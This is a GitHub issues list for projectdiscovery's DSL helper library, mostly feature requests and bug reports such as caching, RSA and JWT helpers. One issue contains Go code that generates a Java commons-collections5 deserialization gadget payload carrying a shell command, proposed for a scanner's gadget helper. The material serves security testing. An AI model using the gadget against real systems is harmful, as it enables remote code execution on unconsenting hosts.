
dsl's People

Contributors

dependabot[bot] avatar dogancanbakir avatar ehsandeep avatar esonhugh avatar iamnoooob avatar manuelberrueta avatar mzack9999 avatar nonsleepr avatar parrasajad avatar ramanareddy0m avatar tarunkoyalwar avatar


dsl's Issues

Support for `commons-collections5` in `generate_java_gadget` function

package main

import (
	"bytes"
	"encoding/hex"
	_ "encoding/hex"
	"fmt"
)

// main prints the hex encoding of the bytes returned by
// generateCommonsCollections5Payload for one fixed sample command string.
func main() {
	payload := generateCommonsCollections5Payload("touch /tmp/success666")
	fmt.Println(hex.EncodeToString(payload))
}

// generateCommonsCollections5Payload returns a byte slice assembled from four
// parts, in order: a hex-decoded prefix constant, a length marker derived from
// len(cmd), the bytes of cmd, and a hex-decoded suffix constant.
//
// cmd is embedded verbatim; this function performs no validation on it.
//
// NOTE(review): both hex.DecodeString errors are discarded. hex.DecodeString
// returns the bytes decoded before an error, so a malformed constant yields a
// truncated part and the caller gets no signal that the output is incomplete.
func generateCommonsCollections5Payload(cmd string) []byte {
	buffer := &bytes.Buffer{}
	// Fixed leading bytes; the decode error is ignored (see NOTE above).
	prefix, _ := hex.DecodeString("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")
	buffer.Write(prefix)
	// string(rune(n)) UTF-8-encodes n as a code point, so a single byte is
	// written only when len(cmd) < 128; larger values become a multi-byte
	// sequence rather than a fixed-width integer.
	// NOTE(review): confirm the length-field width the surrounding constants
	// expect, and reject inputs this encoding cannot represent.
	buffer.WriteString(string(rune(len(cmd))))
	buffer.WriteString(cmd)
	// Fixed trailing bytes; the decode error is ignored (see NOTE above).
	suffix, _ := hex.DecodeString("740004657865637571007e00320000000171007e00377371007e0027737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878")
	buffer.Write(suffix)
	return buffer.Bytes()
}

Add caching layer for deterministic functions

Please describe your feature request:

Most helper functions are deterministic (the output is the same for the same input), and some of them may be invoked multiple times within the same template, which can add significant delay during processing (especially those involving network/disk activity, e.g. jarm with ten TLS connections). This issue proposes introducing an in-memory cache that stores results with a short TTL (e.g. 60 seconds) and a maximum capacity.

Details

  • It must be possible to mark a helper function as deterministic (eg. map/slice)
  • The cache should support auto eviction with a maximum number of items and TTL per item
  • Accessing an item should reset its TTL timer
  • When a deterministic helper is invoked, the logic should check if the full signature function_name(args_values...) (note: a hashing function can be used due to the deterministic property) is present in the cache and still valid and in such case retrieve the value without recalculating the whole return value.

Add helper to format text ProperCase

Please describe your feature request:

It would be useful to add the following helpers:

to_proper(input string) string | Transforms the input into ProperCase characters | to_proper("hello") | Hello

Describe the use case of this feature:

This would be useful for fuzzing filenames/usernames.

Function to support RSA encryption

From projectdiscovery/nuclei-templates#7493

I encountered a vulnerability in a system that uses RSA encryption to encrypt the parameters during the login phase. While researching the vulnerability I already knew the public key used for encryption, but when writing the nuclei template I couldn't find a helper function for RSA encryption. Is there any way I can implement this encryption process in a nuclei template?
The encryption is implemented using JSEncrypt, and the encryption scheme is RSAES-PKCS1-V1_5.

Add Index helper

Add helper function to pick item at position n within slice boundaries

Migrate all helper function and dsl logic from nuclei to this repo

Proposed Changes

Please describe your feature request:

Describe the use case of this feature:

  • DSL is imported in proxify and httpx and some helper functions that are available in nuclei are not available in them
  • helper functions should be consistent across proxify,nuclei and httpx

pls add UTF16 encoding (for powershell command)

Hi all, pls add UTF16 encoding (for powershell command)
thx.
example:

package main

import (
    "encoding/base64"
    "fmt"
    "golang.org/x/text/encoding/unicode"
)


// PowerShell encodes script with the UTF-16 little-endian encoder (IgnoreBOM
// policy) and returns the standard base64 encoding of the resulting bytes.
// The encoder's error, if any, is returned unchanged with an empty string.
func PowerShell(script string) (string, error) {
    enc := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder()
    utf16le, err := enc.String(script)
    if err != nil {
        return "", err
    }
    b64 := base64.StdEncoding.EncodeToString([]byte(utf16le))
    return b64, nil
}


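// main prints the encoded form of a fixed sample string. If PowerShell reports
// an encoding error, the error is printed instead of an empty result, so a
// failed conversion is not mistaken for valid output.
func main() {
    encoded, err := PowerShell("test")
    if err != nil {
        fmt.Println("encoding failed:", err)
        return
    }
    fmt.Println(encoded)
}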

Usage of HMAC.DIGEST() as in python

How can I replicate the capabilities provided by the Python hmac.digest() function using Nuclei hmac helper function. As far as i see nuclei does not support hmac.digest.

Python Example

token=base64.b64encode(hmac.new(secret,data,"sha256").digest());

Nuclei

token={{base64(hmac("sha256",data,secret))}}

Is there a way to replicate python hmac.digest in nuclei.

\d not working

When using the following code, nuclei 2.8.6 throws an error:

"regex('(?i)server: apache/\d', all_headers)"

Error occurred loading template servertokens.yaml: yaml: line 23: found unknown escape character

Why does this not work as expected? Does this need multiple backslashes? According to https://pkg.go.dev/regexp it should support \d.

Only "regex('(?i)server: apache/[0-9]', all_headers)" works.

algorithm in generate_jwt helper should be a required parameter

# Reproduction template: generate_jwt is called with only the claims JSON
# (no algorithm argument), and the resulting value is passed to print_debug
# inside the raw HTTP request.
id: test
variables:  
  json: |
    {
      "tt": "tt"
    }
  jwt: "{{generate_jwt(json)}}"
 
http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
 
        {{print_debug(jwt)}}
$ go run . -debug -verbose -duc -t test.yaml -u http://localhost:80

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.15

                projectdiscovery.io

[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x18c42ee]

goroutine 14 [running]:
github.com/kataras/jwt.encodeToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, {0xc0000f46e0, 0x156, 0x160}, {0x0?, 0x0?})
        /home/marco/go/pkg/mod/github.com/kataras/[email protected]/token.go:35 +0x8e
github.com/kataras/jwt.signToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, 0x0, {0x1e32e00?, 0xc000d60ae0?}, {0x0, 0x0}, {0x0, ...})
        /home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:80 +0x10d
github.com/kataras/jwt.Sign(...)
        /home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:35
github.com/projectdiscovery/dsl.init.0.func77({0xc000d78620, 0x1, 0x0?})
        /home/marco/go/src/github.com/projectdiscovery/dsl/dsl.go:1077 +0x635
github.com/projectdiscovery/dsl.dslFunction.Exec({0x0, {0x2209fa4, 0xc}, 0x0, {0xc000544300, 0x1, 0x1}, 0x286b518}, {0xc000d78620, 0x1, ...})
        /home/marco/go/src/github.com/projectdiscovery/dsl/func.go:54 +0x29c
github.com/Knetic/govaluate.planFunction.makeFunctionStage.func1({0xc0006ad900?, 0x1d7c2a0?}, {0x1d7c2a0, 0xc000d78300?}, {0x227bc26?, 0x412401?})
        /home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/evaluationStage.go:245 +0xac
github.com/Knetic/govaluate.EvaluableExpression.evaluateStage({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc0006ad9a0, ...)
        /home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:232 +0x59d
github.com/Knetic/govaluate.EvaluableExpression.Eval({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, {0x2b31700, ...})
        /home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:163 +0x125
github.com/Knetic/govaluate.EvaluableExpression.Evaluate({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc000d609c0)
        /home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:137 +0x94
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.evaluate({0xc000050150?, 0xc000d609c0?}, 0xc000ecf330?)
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:61 +0x192
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.Evaluate(...)
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:30
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*requestGenerator).Make(0xc0006ac140, {0x2b45aa0, 0xc0008ac0e0}, 0xc000d404b0, {0xc000050150?, 0x4127a5?}, 0xc000d604b0, 0xc000d60390)
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/build_request.go:140 +0xb08
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults.func1({0xc000050150, 0x65}, 0xc?, 0x495eee?)
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:365 +0x16d
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults(0xc00093a8c0, 0xc000d404b0, 0xc000d60390, 0xc000d603c0, 0xc000d4c140)
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:451 +0x34c
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer.(*Executer).Execute(0xc00035e3a0, 0xc000d40498)
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer/executer.go:94 +0x43e
github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2.1(0x1be1c87?, 0x0?, 0xc000d4e860)
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:128 +0x289
created by github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2 in goroutine 13
        /home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:105 +0x4f1
exit status 2
